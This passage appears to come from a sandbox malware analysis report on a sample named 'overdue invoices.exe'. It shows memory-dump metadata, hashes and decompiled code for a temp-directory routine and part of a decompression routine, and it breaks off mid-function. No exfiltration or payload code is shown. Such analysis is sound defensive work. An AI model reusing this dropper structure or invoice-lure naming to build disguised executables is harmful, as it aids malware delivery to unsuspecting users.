                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: CountFileNameTempTick
                  • String ID: "C:\Users\user\Desktop\overdue invoices.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                  • API String ID: 1716503409-407086923
                  • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                  • Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
                  • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                  • Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004031F1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 84%
                  			E004031F1(void* __eflags) {
				void* _t2;
				void* _t5;
				CHAR* _t6;

				_t6 = "C:\\Users\\engineer\\AppData\\Local\\Temp\\";
				E00405CE3(_t6);
				_t2 = E004055E5(_t6);
				if(_t2 != 0) {
					E00405578(_t6);
					CreateDirectoryA(_t6, 0); // executed
					_t5 = E0040578B("1033", _t6); // executed
					return _t5;
				} else {
					return _t2;
				}
			}






                  0x004031f2
                  0x004031f8
                  0x004031fe
                  0x00403205
                  0x0040320a
                  0x00403212
                  0x0040321e
                  0x00403224
                  0x00403208
                  0x00403208
                  0x00403208

                  APIs
                    • Part of subcall function 00405CE3: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\overdue invoices.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
                    • Part of subcall function 00405CE3: CharNextA.USER32(?,?,?,00000000), ref: 00405D48
                    • Part of subcall function 00405CE3: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\overdue invoices.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
                    • Part of subcall function 00405CE3: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\overdue invoices.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D
                  • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00403212
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.353083562.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.353061007.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353104897.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353122481.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353189601.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353211045.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.353232893.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_overdue invoices.jbxd
                  Similarity
                  • API ID: Char$Next$CreateDirectoryPrev
                  • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                  • API String ID: 4115351271-3512041753
                  • Opcode ID: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                  • Instruction ID: 52f5018bb87fe832e559484150a565c10a299960058697363e648776ae6da385
                  • Opcode Fuzzy Hash: 048fde499a06d2c9d784819047d513c4ac368109c0a7a4f8390a920d62fbeaed
                  • Instruction Fuzzy Hash: 68D0C92164AD3036D551372A3D0AFDF090D9F4272EF21417BF804B50CA5B6C6A8319EF
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00406481 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 617 406481-406487 618 406489-40648b 617->618 619 40648c-4064aa 617->619 618->619 620 4066b8-4066cd 619->620 621 40677d-40678a 619->621 622 4066e7-4066fd 620->622 623 4066cf-4066e5 620->623 624 4067b4-4067b8 621->624 625 406700-406707 622->625 623->625 626 406818-40682b 624->626 627 4067ba-4067db 624->627 628 406709-40670d 625->628 629 40672e 625->629 632 406734-40673a 626->632 630 4067f4-406807 627->630 631 4067dd-4067f2 627->631 633 406713-40672b 628->633 634 4068bc-4068c6 628->634 629->632 635 40680a-406811 630->635 631->635 637 4068e7 632->637 638 405edf 632->638 633->629 641 4068d2-4068e5 634->641 639 4067b1 635->639 640 406813 635->640 647 4068ea-4068ee 637->647 642 405ee6-405eea 638->642 643 406026-406047 638->643 644 405f8b-405f8f 638->644 645 405ffb-405fff 638->645 639->624 649 406796-4067ae 640->649 650 4068c8 640->650 641->647 642->641 648 405ef0-405efd 642->648 643->620 653 405f95-405fae 644->653 654 40683b-406845 644->654 651 406005-406019 645->651 652 40684a-406854 645->652 648->637 655 405f03-405f49 648->655 649->639 650->641 656 40601c-406024 651->656 652->641 657 405fb1-405fb5 653->657 654->641 658 405f71-405f73 655->658 659 405f4b-405f4f 655->659 656->643 656->645 657->644 660 405fb7-405fbd 657->660 665 405f81-405f89 658->665 666 405f75-405f7f 658->666 663 405f51-405f54 GlobalFree 659->663 664 405f5a-405f68 GlobalAlloc 659->664 661 405fe7-405ff9 660->661 662 405fbf-405fc6 660->662 661->656 667 405fd1-405fe1 GlobalAlloc 662->667 668 405fc8-405fcb GlobalFree 662->668 663->664 664->637 669 405f6e 664->669 665->657 666->665 666->666 667->637 667->661 668->667 669->658
                  C-Code - Quality: 99%
                  			E00406481() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
